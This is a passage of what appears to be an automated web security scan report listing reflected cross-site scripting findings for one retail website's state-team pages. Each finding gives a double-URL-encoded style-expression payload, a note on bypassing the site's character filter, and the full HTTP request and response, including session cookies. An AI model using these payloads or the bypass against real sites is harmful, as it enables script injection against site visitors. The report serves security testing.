Last-Modified: Sat, 20 Nov 2010 17:52:18 GMT
NS_RTIMER_COMPOSITE: 1114198378:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=950
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 87630


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Montreal</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=260175&7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1=1&7c04c'style='x:expression(alert(1))'d59743044a1=1&7c04c%27style%3d%27x%3aexpression%28alert%281%29%29%27d59743044a1=1&fromsla=T'>
...[SNIP]...

1.106. http://www.turnerlicensing.com/teams_by_state/Nebraska [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Nebraska

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e07a'style='x:expression(alert(1))'040901e41e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Nebraska?6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:28 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 334654614:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=992
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110184


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Nebraska</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
nsing.com/s.nl?sc=77&category=175384&6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8=1&6e07a%27style%3d%27x%3aexpression%28alert%281%29%29%27040901e41e8=1&fromsla=T&6e07a'style='x:expression(alert(1))'040901e41e8=1'>
...[SNIP]...

1.107. http://www.turnerlicensing.com/teams_by_state/Nevada [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Nevada

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebfbe'style='x:expression(alert(1))'c4304c5bf67 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Nevada?ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:16 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:16 GMT
NS_RTIMER_COMPOSITE: 1558098223:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=956
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54497


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Nevada</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175385&ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67=1&ebfbe'style='x:expression(alert(1))'c4304c5bf67=1&ebfbe%27style%3d%27x%3aexpression%28alert%281%29%29%27c4304c5bf67=1&fromsla=T'>
...[SNIP]...

1.108. http://www.turnerlicensing.com/teams_by_state/New-Hampshire [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/New-Hampshire

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89c49'style='x:expression(alert(1))'4d9b5eac50e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/New-Hampshire?89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:17 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:16 GMT
NS_RTIMER_COMPOSITE: 328760091:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=992
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54525


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Hampshire</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175387&89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e=1&fromsla=T&89c49'style='x:expression(alert(1))'4d9b5eac50e=1&89c49%27style%3d%27x%3aexpression%28alert%281%29%29%274d9b5eac50e=1'>
...[SNIP]...

1.109. http://www.turnerlicensing.com/teams_by_state/New-Jersey [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/New-Jersey

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ebf4'style='x:expression(alert(1))'1fb26256c52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/New-Jersey?3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:33 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 1666357906:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=988
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110394


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Jersey</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175388&3ebf4%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271fb26256c52=1&3ebf4%27style%3d%27x%3aexpression%28alert%281%29%29%271fb26256c52=1&3ebf4'style='x:expression(alert(1))'1fb26256c52=1&fromsla=T'>
...[SNIP]...

1.110. http://www.turnerlicensing.com/teams_by_state/New-Mexico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/New-Mexico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf719'style='x:expression(alert(1))'81128e78a9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/New-Mexico?bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:36 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -1590876485:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=940
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110232


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Mexico</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175389&bf719%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252781128e78a9f=1&bf719'style='x:expression(alert(1))'81128e78a9f=1&bf719%27style%3d%27x%3aexpression%28alert%281%29%29%2781128e78a9f=1&fromsla=T'>
...[SNIP]...

1.111. http://www.turnerlicensing.com/teams_by_state/New-York [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/New-York

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fed0'style='x:expression(alert(1))'69b8cb3cf13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/New-York?1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:35 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 334656480:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=996
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111485


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New York</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175390&1fed0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252769b8cb3cf13=1&1fed0'style='x:expression(alert(1))'69b8cb3cf13=1&1fed0%27style%3d%27x%3aexpression%28alert%281%29%29%2769b8cb3cf13=1&fromsla=T'>
...[SNIP]...

1.112. http://www.turnerlicensing.com/teams_by_state/North-Carolina [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/North-Carolina

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 650fc'style='x:expression(alert(1))'1f5f4cac11d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/North-Carolina?650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:33 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 226401215:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=939
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111006


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>North Carolina</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
nsing.com/s.nl?sc=77&category=175392&650fc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271f5f4cac11d=1&650fc%27style%3d%27x%3aexpression%28alert%281%29%29%271f5f4cac11d=1&fromsla=T&650fc'style='x:expression(alert(1))'1f5f4cac11d=1'>
...[SNIP]...

1.113. http://www.turnerlicensing.com/teams_by_state/North-Dakota [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/North-Dakota

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fdb3'style='x:expression(alert(1))'d6800f7fe01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/North-Dakota?4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:24 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: 772662588:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54521


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>North Dakota</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175668&4fdb3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6800f7fe01=1&4fdb3'style='x:expression(alert(1))'d6800f7fe01=1&fromsla=T&4fdb3%27style%3d%27x%3aexpression%28alert%281%29%29%27d6800f7fe01=1'>
...[SNIP]...

1.114. http://www.turnerlicensing.com/teams_by_state/Ohio [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Ohio

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6304b'style='x:expression(alert(1))'d67f8a8edb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Ohio?6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:39 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 772666872:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=956
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110948


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ohio</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175669&6304b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d67f8a8edb6=1&fromsla=T&6304b'style='x:expression(alert(1))'d67f8a8edb6=1&6304b%27style%3d%27x%3aexpression%28alert%281%29%29%27d67f8a8edb6=1'>
...[SNIP]...

1.115. http://www.turnerlicensing.com/teams_by_state/Oklahoma [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Oklahoma

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9598'style='x:expression(alert(1))'673ea07282e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Oklahoma?f9598%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527673ea07282e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
